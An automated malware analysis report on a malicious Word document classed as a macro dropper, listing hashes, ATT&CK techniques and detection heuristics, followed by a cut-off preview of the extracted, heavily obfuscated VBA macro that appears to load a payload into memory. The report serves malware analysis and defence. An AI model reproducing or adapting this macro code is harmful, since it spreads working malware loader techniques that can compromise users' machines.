Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 667752cadad91de5…

MALICIOUS

Office (OLE)

Size: 214.5 KB
Created: 2017-11-01 14:57:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 26b6af2245556b6075856314253e6313
SHA-1: 332bb31077a791b89771f3d4e7bc73762dc96a2f
SHA-256: 667752cadad91de5900ec1da18b81a4ba623468d33ce7847330fbd99dba2a263
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that executes shell commands, which indicates a dropper. The presence of a macro-enable lure further supports this assessment, and the ClamAV detection confirms the file as a document dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6362637-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6362637-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13098 bytes
SHA-256: 3155762b2dda32c36472853b4800455230d69fefbe2e9538122bcda431511ab3

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Sub poon()
Dim bahamas As Long
Dim fama As Long
assuefaction.rankle.Value = Day(#12/5/2013#)
varday = ethnically = cyclothymic
undesirability = contre
cleancut = doting
spatiotemporal = "remus"
amphitryon = "tractable"

drollish = "deliverer"
choreographer = gstring
bowsprit = poca
Set scouring = assuefaction.rankle.SelectedItem
selfaccusation = 68
averageness = 35785
babyrousa = 210077
 Pmt 0, selfaccusation, 6337, 51135, 8

bloodroot = scouring.Name
fakery = 88 - 22 + 7778
fortuna = Right(bloodroot, fakery)
bimonthly = blocktwo.concentrated(fortuna)
lemuridae = 117
coraciidae = 37594
plena = 244821
 Pmt 0, lemuridae, 28818, 51835, 4

impreciseness = "labent"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim prosily As Variant
Dim hydrocephalus As LongPtr
Dim destiny As LongPtr
Dim vox As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim extinguisher As String
Dim destiny As Long
Dim ostensibly As String
Dim hydrocephalus As Long
#End If
caught = 87 - 19 - 68
acanthuridae = "lumpy"
ditty = 78 - 83 + 4101
affronterai = 38
distractedly = 11898
alkylbenzenesulfonate = 216104
 Pmt 0, affronterai, 31131, 39872, 8

armigerous = "controvert"
gateau = "dilection"
cranch = 46
chauntress = 39943
crucifer = 258050
 Pmt 0, cranch, 10911, 19759, 6

pee = bimonthly
ideologically = "princess"
scorpio = "breezily"
hydrocephalus = bare(pee)
crabbiness = cstern
anaphor = "caducity"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim nymphaea As Long
Dim berliner As LongPtr
Dim hypothalamic As LongPtr
Dim arbitrement As LongPtr
angled = 79 - 91 + 2076
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim berliner As Long
amount = 98 - 11 + 694
Dim hypothalamic As Long
Dim arbitrement As Long
angled = amount + 3459

#End If
Dim abreast As Variant
Dim dock As Variant
berliner = 70 - 67 - 3
destiny = hydrocephalus + angled
hypothalamic = 29 - 78 + 201576
arbitrement = 91 - 116 + 3525
pueblo = moorcock(hypothalamic, berliner, destiny, berliner, berliner, berliner, berliner)
jackknifefish = 1
irritant = 35533
concesso = 335306
 Pmt 0, jackknifefish, 27624, 44868, 6

End Sub

Function bare(ave)
Dim malvaceae As Variant
Dim dramatic As String
Dim mendelism As String
Dim rutundo As Byte
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim charioteer As Integer
Dim aminopyrine As LongPtr
frasera = 90 - 6 - 76
Dim recurved As LongPtr
Dim mazed As Variant
Dim sivapithecus As Byte
Dim hedeoma As LongPtr
Dim archaeopteryx As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim aminopyrine As Long
frasera = 35 - 65 + 34
Dim recurved As Long
Dim hedeoma As Long
#End If
cymatiidae = VarPtr(aminopyrine)
arduousness = coll(cymatiidae, VarPtr(ave) + 8, frasera)
pedionomus = 88 - 25 - 64
recurved = 97 - 86 - 11
equilibration = 119 - 70 - 49
hedeoma = 88 - 52 + 9328
lowring = 48 - 38 + 4086
tractility = 105 - 116 + 75
buccal = diffuseness(ByVal pedionomus, _
recurved, _
ByVal equilibration, _
hedeoma, _
ByVal lowring, _
ByVal tractility)
concertgoer = Fix(295)

nanny = discourtesy

coll recurved, aminopyrine, 34 - 4 + 5853
antitrades = 116
sleekly = 38210
postage = 579371
 Pmt 0, antitrades, 39736, 22381, 4

bare = recurved
End Function
Function coll(maldon, menacing, amateurism)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim myxocephalus As Long
Dim colored As Variant
Dim comfrey As LongPtr
Dim alkaline As LongPtr
Dim preachment As LongPtr
Dim dukedom As String
Dim assimilate As LongPtr
Dim deal As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (2
... (truncated)